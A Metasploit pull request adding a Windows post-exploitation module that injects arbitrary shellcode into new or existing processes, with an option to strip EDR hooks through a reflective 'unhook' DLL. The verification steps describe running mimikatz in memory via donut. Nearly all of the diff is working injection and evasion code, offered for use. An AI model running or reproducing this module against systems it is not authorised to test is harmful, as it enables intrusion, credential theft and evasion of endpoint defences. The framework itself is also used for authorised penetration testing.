### PR TITLE
Add shellcode_inject post module

### DIFF
--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -1,10 +1,14 @@
 # -*- coding: binary -*-
 
+require 'msf/core/post/windows/reflective_dll_injection'
+
 module Msf
 class Post
 module Windows
 
 module Process
+
+  include Msf::Post::Windows::ReflectiveDLLInjection
 
   # Checks the Architeture of a Payload and PID are compatible
   # Returns true if they are false if they are not

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -34,107 +34,86 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options(
       [
-        OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
-        OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false])
+        OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload. 0=New Process', 0]),
+        OptBool.new('AUTOUNHOOK', [false, 'Auto remove EDRs hooks', false]),
+        OptInt.new('WAIT_UNHOOK', [true, 'Seconds to wait for unhook to be executed', 5])
       ])
   end
 
   # Run Method for when run command is issued
   def exploit
     @payload_name = datastore['PAYLOAD']
-    @payload_arch = framework.payloads.create(@payload_name).arch
+    @payload_arch = ARCH_X86
+    payload_arch_old = framework.payloads.create(@payload_name).arch.first
+e    # convert the old style archetecture to the new style
+    @payload_arch = ARCH_X64 if payload_arch_old.include?('64')
+
+    # prelim checks
+    if client.arch == ARCH_X86 and @payload_arch == ARCH_X64
+      fail_with(Failure::BadConfig, "Cannot inject a 64-bit payload into any process on a 32-bit OS")
+    end
+    if @payload_arch == ARCH_X64
+      vprint_status("64-bit payload detected")
+    else
+      vprint_status("WTF")
+    end
 
     # syinfo is only on meterpreter sessions
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
-    pid = get_pid
+    pid = get_proc(datastore['PID'])
     if not pid
       print_error("Unable to get a proper PID")
       return
     end
 
-    inject_into_pid(pid)
+    unless arch_check(@payload_arch, pid)
+      fail_with(Failure::BadConfig, "Mismatched payload/process architecture")
+    end
+    if datastore['AUTOUNHOOK']
+      print_status("Executing unhook")
+      print_status("Waiting #{datastore['WAIT_UNHOOK']} seconds for unhook Reflective DLL to be executed...")
+      unless inject_unhook(proc, @payload_arch)
+        fail_with(Failure::BadConfig, "Unknown target arch; unable to assign unhook dll")
+      end
+    end
+    begin
+      inject_into_pid(pid)
+    rescue ::Exception => e
+      print_error("Failed to inject Payload to #{pid}!")
+      print_error(e.to_s)
+    end
   end
 
   # Figures out which PID to inject to
-  def get_pid
-    pid = datastore['PID']
-    if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid)
-      print_status("Launching notepad.exe...")
-      pid = create_temp_proc
-    end
-
-    return pid
-  end
-
-
-  # Determines if a PID actually exists
-  def has_pid?(pid)
-    procs = []
-    begin
-      procs = client.sys.process.processes
-    rescue Rex::Post::Meterpreter::RequestError
-      print_error("Unable to enumerate processes")
-      return false
-    end
-
-    procs.each do |p|
-      found_pid = p['pid']
-      return true if found_pid == pid
-    end
-
-    print_error("PID #{pid.to_s} does not actually exist.")
-
-    return false
-  end
-
-  # Checks the Architeture of a Payload and PID are compatible
-  # Returns true if they are false if they are not
-  def arch_check(pid)
-    # get the pid arch
-    client.sys.process.processes.each do |p|
-      # Check Payload Arch
-      if pid == p["pid"]
-        vprint_status("Process found checking Architecture")
-        if @payload_arch.first == p['arch']
-          vprint_good("Process is the same architecture as the payload")
-          return true
-        else
-          print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.")
-          return false
-        end
+  def get_proc(pid)
+    if pid == 0
+      notepad_pathname = get_notepad_pathname(@payload_arch, client.sys.config.getenv('windir'), client.arch)
+      vprint_status("Starting  #{notepad_pathname}")
+      proc = client.sys.process.execute(notepad_pathname, nil, {'Hidden' => datastore['HIDDEN']})
+      if proc.nil?
+        print_bad("Failed to start notepad process")
+      else
+        print_status("Spawned Notepad process #{proc.pid}")
+      end
+    else
+      if not has_pid?(pid)
+        print_error("Process #{pid} was not found")
+        return nil
+      end
+      proc = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+      if proc.nil?
+        print_bad("Failed to start notepad process")
+      else
+        print_status("Opening existing process #{proc.pid}")
       end
     end
-  end
-
-  # Creates a temp notepad.exe to inject payload in to given the payload
-  # Returns process PID
-  def create_temp_proc()
-    windir = client.sys.config.getenv('windir')
-    # Select path of executable to run depending the architecture
-    if @payload_arch.first== ARCH_X86 and client.arch == ARCH_X86
-      cmd = "#{windir}\\System32\\notepad.exe"
-    elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X64
-      cmd = "#{windir}\\System32\\notepad.exe"
-    elsif @payload_arch.first == ARCH_X64 and client.arch == ARCH_X86
-      cmd = "#{windir}\\Sysnative\\notepad.exe"
-    elsif @payload_arch.first == ARCH_X86 and client.arch == ARCH_X64
-      cmd = "#{windir}\\SysWOW64\\notepad.exe"
-    end
-
-    begin
-      proc = client.sys.process.execute(cmd, nil, {'Hidden' => true})
-    rescue Rex::Post::Meterpreter::RequestError
-      return nil
-    end
-
     return proc.pid
   end
 
   def inject_into_pid(pid)
     vprint_status("Performing Architecture Check")
-    return if not arch_check(pid)
-
+    return if not arch_check(@payload_arch, pid)
     begin
       print_status("Preparing '#{@payload_name}' for PID #{pid}")
       raw = payload.encoded

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core/exploit/exe'
+require 'msf/core/post/windows/reflective_dll_injection'
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::Windows::Process
+  include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info={})
     super( update_info( info,
@@ -45,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Local
     @payload_name = datastore['PAYLOAD']
     @payload_arch = ARCH_X86
     payload_arch_old = framework.payloads.create(@payload_name).arch.first
-e    # convert the old style archetecture to the new style
+    # convert the old style archetecture to the new style
     @payload_arch = ARCH_X64 if payload_arch_old.include?('64')
 
     # prelim checks
@@ -61,24 +63,25 @@ e    # convert the old style archetecture to the new style
     # syinfo is only on meterpreter sessions
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
-    pid = get_proc(datastore['PID'])
-    if not pid
+    proc = get_proc(datastore['PID'])
+    if not proc
       print_error("Unable to get a proper PID")
       return
     end
 
-    unless arch_check(@payload_arch, pid)
+    unless arch_check(@payload_arch, proc.pid)
       fail_with(Failure::BadConfig, "Mismatched payload/process architecture")
     end
     if datastore['AUTOUNHOOK']
       print_status("Executing unhook")
       print_status("Waiting #{datastore['WAIT_UNHOOK']} seconds for unhook Reflective DLL to be executed...")
-      unless inject_unhook(proc, @payload_arch)
+      unless inject_unhook(proc, @payload_arch, datastore['WAIT_UNHOOK'])
         fail_with(Failure::BadConfig, "Unknown target arch; unable to assign unhook dll")
       end
     end
+    print_status("Injecting payload into #{proc.pid}")
     begin
-      inject_into_pid(pid)
+      inject_into_pid(proc.pid)
     rescue ::Exception => e
       print_error("Failed to inject Payload to #{pid}!")
       print_error(e.to_s)
@@ -108,7 +111,7 @@ e    # convert the old style archetecture to the new style
         print_status("Opening existing process #{proc.pid}")
       end
     end
-    return proc.pid
+    return proc
   end
 
   def inject_into_pid(pid)

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -4,13 +4,11 @@
 ##
 
 require 'msf/core/exploit/exe'
-require 'msf/core/post/windows/reflective_dll_injection'
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::Windows::Process
-  include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info={})
     super( update_info( info,
@@ -50,14 +48,12 @@ class MetasploitModule < Msf::Exploit::Local
     # convert the old style archetecture to the new style
     @payload_arch = ARCH_X64 if payload_arch_old.include?('64')
 
+    vprint_status("Client Arch = #{client.arch}")
+    vprint_status("Payload Arch = #{@payload_arch}")
+
     # prelim checks
     if client.arch == ARCH_X86 and @payload_arch == ARCH_X64
       fail_with(Failure::BadConfig, "Cannot inject a 64-bit payload into any process on a 32-bit OS")
-    end
-    if @payload_arch == ARCH_X64
-      vprint_status("64-bit payload detected")
-    else
-      vprint_status("WTF")
     end
 
     # syinfo is only on meterpreter sessions

--- a/modules/post/windows/manage/shellcode_inject.rb
+++ b/modules/post/windows/manage/shellcode_inject.rb
@@ -1,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/common'
+require 'msf/core/post/windows/reflective_dll_injection'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Common
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Manage Memory Shellcode Injection Module',
+      'Description'   => %q{
+        This module will inject into the memory of a process a specified shellcode.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'phra <https://iwantmore.pizza>' ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
+
+    register_options(
+      [
+        OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),
+        OptInt.new('PID', [false, 'Process Identifier to inject of process to inject the shellcode. (0 = new process)', 0]),
+        OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', true]),
+        OptBool.new('INTERACTIVE', [true, 'Interact with the process', true]),
+        OptBool.new('HIDDEN', [true, 'Spawn an hidden process', true]),
+        OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])
+      ])
+  end
+
+  # Run Method for when run command is issued
+  def run
+
+    # syinfo is only on meterpreter sessions
+    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+
+    # Set variables
+    shellcode = IO.read(datastore['SHELLCODE'])
+    pid = datastore['PID']
+    bits = datastore['BITS']
+    p = nil
+    if bits == '64'
+      bits = ARCH_X64
+    else
+      bits = ARCH_X86
+    end
+
+    if pid == 0 or not has_pid?(pid)
+      p = create_temp_proc(bits)
+      print_status("Spawned process #{p.pid}")
+    else
+      print_status("Opening process #{p.pid}")
+      p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+    end
+
+    if bits == ARCH_X64 and client.arch == ARCH_X86
+      print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
+      print_error("Migrate to an x64 process and try again.")
+      return false
+    elsif arch_check(bits, p.pid)
+      inject(shellcode, p)
+    end
+  end
+
+  # Checks the Architeture of a Payload and PID are compatible
+  # Returns true if they are false if they are not
+  def arch_check(bits, pid)
+    # get the pid arch
+    client.sys.process.processes.each do |p|
+      # Check Payload Arch
+      if pid == p["pid"]
+        print_status("Process found checking Architecture")
+        if bits == p['arch']
+          print_good("Process is the same architecture as the payload")
+          return true
+        else
+          print_error("The PID #{ p['arch']} and Payload #{bits} architectures are different.")
+          return false
+        end
+      end
+    end
+  end
+
+  # Creates a temp notepad.exe to inject payload in to given the payload
+  # Returns process PID
+  def create_temp_proc(bits)
+    windir = client.sys.config.getenv('windir')
+    # Select path of executable to run depending the architecture
+    if bits == ARCH_X86 and client.arch == ARCH_X86
+      cmd = "#{windir}\\System32\\notepad.exe"
+    elsif bits == ARCH_X64 and client.arch == ARCH_X64
+      cmd = "#{windir}\\System32\\notepad.exe"
+    elsif bits == ARCH_X64 and client.arch == ARCH_X86
+      cmd = "#{windir}\\Sysnative\\notepad.exe"
+    elsif bits == ARCH_X86 and client.arch == ARCH_X64
+      cmd = "#{windir}\\SysWOW64\\notepad.exe"
+    end
+
+    proc = client.sys.process.execute(cmd, nil, {
+      'Hidden' => datastore['HIDDEN'],
+      'Channelized' => datastore['CHANNELIZED'],
+      'Interactive' => datastore['INTERACTIVE']
+    })
+
+    return proc
+  end
+
+  def inject(shellcode, p)
+    print_status("Injecting shellcode into process ID #{p.pid}")
+    begin
+      print_status("Allocating memory in process #{p.pid}")
+      mem = inject_into_process(p, shellcode)
+      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode")
+      p.thread.create(mem, 0)
+      print_good("Successfully injected payload into process: #{p.pid}")
+
+      if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
+        print_status("Interacting")
+        client.console.interact_with_channel(p.channel)
+      elsif datastore['CHANNELIZED']
+        print_status("Retrieving output")
+        data = p.channel.read
+        print_line(data) if data
+      end
+    rescue ::Exception => e
+      print_error("Failed to inject Payload to #{p.pid}!")
+      print_error(e.to_s)
+    end
+  end
+end

--- a/modules/post/windows/manage/shellcode_inject.rb
+++ b/modules/post/windows/manage/shellcode_inject.rb
@@ -53,13 +53,13 @@ class MetasploitModule < Msf::Post
     end
 
     if pid == 0
+      p = create_temp_proc(bits)
+      print_status("Spawned process #{p.pid}")
+    else
       if not has_pid?(pid)
         print_error("Process #{pid} was not found")
         return false
       end
-      p = create_temp_proc(bits)
-      print_status("Spawned process #{p.pid}")
-    else
       p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
       print_status("Opening process #{p.pid}")
     end

--- a/modules/post/windows/manage/shellcode_inject.rb
+++ b/modules/post/windows/manage/shellcode_inject.rb
@@ -4,12 +4,10 @@
 ##
 
 require 'msf/core/post/common'
-require 'msf/core/post/windows/reflective_dll_injection'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Common
   include Msf::Post::Windows::Process
-  include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info={})
     super( update_info( info,

--- a/modules/post/windows/manage/shellcode_inject.rb
+++ b/modules/post/windows/manage/shellcode_inject.rb
@@ -8,6 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Common
+  include Msf::Post::Windows::Process
   include Msf::Post::Windows::ReflectiveDLLInjection
 
   def initialize(info={})
@@ -26,10 +27,10 @@ class MetasploitModule < Msf::Post
       [
         OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),
         OptInt.new('PID', [false, 'Process Identifier to inject of process to inject the shellcode. (0 = new process)', 0]),
-        OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', true]),
-        OptBool.new('INTERACTIVE', [true, 'Interact with the process', true]),
+        OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', false]),
+        OptBool.new('INTERACTIVE', [true, 'Interact with the process', false]),
         OptBool.new('HIDDEN', [true, 'Spawn an hidden process', true]),
-        OptBool.new('AUTOUNHOOK', [true, 'Auto remove EDRs hooks', true]),
+        OptBool.new('AUTOUNHOOK', [true, 'Auto remove EDRs hooks', false]),
         OptInt.new('WAIT_UNHOOK', [true, 'Seconds to wait for unhook to be executed', 5]),
         OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])
       ])
@@ -37,7 +38,6 @@ class MetasploitModule < Msf::Post
 
   # Run Method for when run command is issued
   def run
-
     # syinfo is only on meterpreter sessions
     print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
@@ -52,116 +52,70 @@ class MetasploitModule < Msf::Post
       bits = ARCH_X86
     end
 
+    # prelim check
+    if client.arch == ARCH_X86 and @payload_arch == ARCH_X64
+      fail_with(Failure::BadConfig, "Cannot inject a 64-bit payload into any process on a 32-bit OS")
+    end
+
+    # Start Notepad if Required
     if pid == 0
-      p = create_temp_proc(bits)
-      print_status("Spawned process #{p.pid}")
+      notepad_pathname = get_notepad_pathname(bits, client.sys.config.getenv('windir'), client.arch)
+      vprint_status("Starting  #{notepad_pathname}")
+      proc = client.sys.process.execute(notepad_pathname, nil, {
+        'Hidden' => datastore['HIDDEN'],
+        'Channelized' => datastore['CHANNELIZED'],
+        'Interactive' => datastore['INTERACTIVE']
+      })
+      print_status("Spawned Notepad process #{proc.pid}")
     else
       if not has_pid?(pid)
         print_error("Process #{pid} was not found")
         return false
       end
-      p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
-      print_status("Opening process #{p.pid}")
+      begin
+        proc = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+      rescue Rex::Post::Meterpreter::RequestError => e
+        print_error(e.to_s)
+        fail_with(Failure::NoAccess, "Failed to open pid #{pid.to_i}")
+      end
+      print_status("Opening existing process #{proc.pid}")
     end
 
+    # Check
     if bits == ARCH_X64 and client.arch == ARCH_X86
       print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
       print_error("Migrate to an x64 process and try again.")
       return false
-    elsif arch_check(bits, p.pid)
+    elsif arch_check(bits, proc.pid)
       if datastore['AUTOUNHOOK']
-        inject_unhook(p, bits)
-      end
-
-      inject(shellcode, p)
-    end
-  end
-
-  # Checks the Architeture of a Payload and PID are compatible
-  # Returns true if they are false if they are not
-  def arch_check(bits, pid)
-    # get the pid arch
-    client.sys.process.processes.each do |p|
-      # Check Payload Arch
-      if pid == p["pid"]
-        print_status("Process found checking Architecture")
-        if bits == p['arch']
-          print_good("Process is the same architecture as the payload")
-          return true
-        else
-          print_error("The PID #{ p['arch']} and Payload #{bits} architectures are different.")
-          return false
+        print_status("Executing unhook")
+        print_status("Waiting #{datastore['WAIT_UNHOOK']} seconds for unhook Reflective DLL to be executed...")
+        unless inject_unhook(proc, bits, datastore['WAIT_UNHOOK'])
+          fail_with(Failure::BadConfig, "Unknown target arch; unable to assign unhook dll")
         end
       end
-    end
-  end
-
-  # Creates a temp notepad.exe to inject payload in to given the payload
-  # Returns process PID
-  def create_temp_proc(bits)
-    windir = client.sys.config.getenv('windir')
-    # Select path of executable to run depending the architecture
-    if bits == ARCH_X86 and client.arch == ARCH_X86
-      cmd = "#{windir}\\System32\\notepad.exe"
-    elsif bits == ARCH_X64 and client.arch == ARCH_X64
-      cmd = "#{windir}\\System32\\notepad.exe"
-    elsif bits == ARCH_X64 and client.arch == ARCH_X86
-      cmd = "#{windir}\\Sysnative\\notepad.exe"
-    elsif bits == ARCH_X86 and client.arch == ARCH_X64
-      cmd = "#{windir}\\SysWOW64\\notepad.exe"
-    end
-
-    proc = client.sys.process.execute(cmd, nil, {
-      'Hidden' => datastore['HIDDEN'],
-      'Channelized' => datastore['CHANNELIZED'],
-      'Interactive' => datastore['INTERACTIVE']
-    })
-
-    return proc
-  end
-
-  def inject_unhook(p, bits)
-    if bits == ARCH_X64
-      dll_file_name = 'x64.dll'
-      vprint_status("Assigning payload ext_server_unhook.x64.dll")
-    elsif bits == ARCH_X86
-      dll_file_name = 'x86.dll'
-      vprint_status("Assigning payload ext_server_unhook.x86.dll")
-    else
-      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign unhook dll")
-    end
-
-    dll_file = MetasploitPayloads.meterpreter_ext_path('unhook', dll_file_name)
-    print_status("Injecting unhook Reflective DLL into process ID #{p.pid}")
-    dll, offset = inject_dll_into_process(p, dll_file)
-    print_status("Executing unhook")
-    p.thread.create(dll + offset, 0)
-    print_status("Waiting #{datastore['WAIT_UNHOOK']} seconds for unhook Reflective DLL to be executed...")
-    Rex.sleep(datastore['WAIT_UNHOOK'])
-  end
-
-  def inject(shellcode, p)
-    print_status("Injecting shellcode into process ID #{p.pid}")
-    begin
-      print_status("Allocating memory in process #{p.pid}")
-      mem = inject_into_process(p, shellcode)
-      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode")
-      p.thread.create(mem, 0)
-      print_good("Successfully injected payload into process: #{p.pid}")
-
-      if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
-        print_status("Interacting")
-        client.console.interact_with_channel(p.channel)
-      elsif datastore['CHANNELIZED'] && datastore['PID'] == 0
-        print_status("Retrieving output")
-        data = p.channel.read
-        print_line(data) if data
-      elsif datastore['CHANNELIZED'] && datastore['PID'] != 0
-        print_warning("It's not possible to retrieve output when injecting existing processes.")
+      begin
+        inject(shellcode, proc)
+      rescue ::Exception => e
+        print_error("Failed to inject Payload to #{proc.pid}!")
+        print_error(e.to_s)
       end
-    rescue ::Exception => e
-      print_error("Failed to inject Payload to #{p.pid}!")
-      print_error(e.to_s)
+    end
+  end
+
+  def inject(shellcode, proc)
+    mem = inject_into_process(proc, shellcode)
+    proc.thread.create(mem, 0)
+    print_good("Successfully injected payload into process: #{proc.pid}")
+    if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
+      print_status("Interacting")
+      client.console.interact_with_channel(proc.channel)
+    elsif datastore['CHANNELIZED'] && datastore['PID'] == 0
+      print_status("Retrieving output")
+      data = proc.channel.read
+      print_line(data) if data
+    elsif datastore['CHANNELIZED'] && datastore['PID'] != 0
+      print_warning("It's not possible to retrieve output when injecting existing processes.")
     end
   end
 end


### PR DESCRIPTION
This module injects an arbitrary shellcode into a target process.
Combined with https://github.com/TheWover/donut it enables arbitrary execution in memory of any kind of executable.

https://twitter.com/phraaaaaaa/status/1179785130539458561
https://twitter.com/phraaaaaaa/status/1181237284345143296

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Spawn meterpreter
- [x] `use post/windows/manage/shellcode_inject`
- [x] `set session 1`
- [x] `donut -f mimikatz.exe -a 2 -o /tmp/payload.bin`
- [x] `set SHELLCODE /tmp/payload.bin`
- [x] `run`
- [x] Mimikatz is interactively executed

![image](https://user-images.githubusercontent.com/984628/66137622-a63ccd80-e5fd-11e9-90e0-2ecb31d17ec2.png)
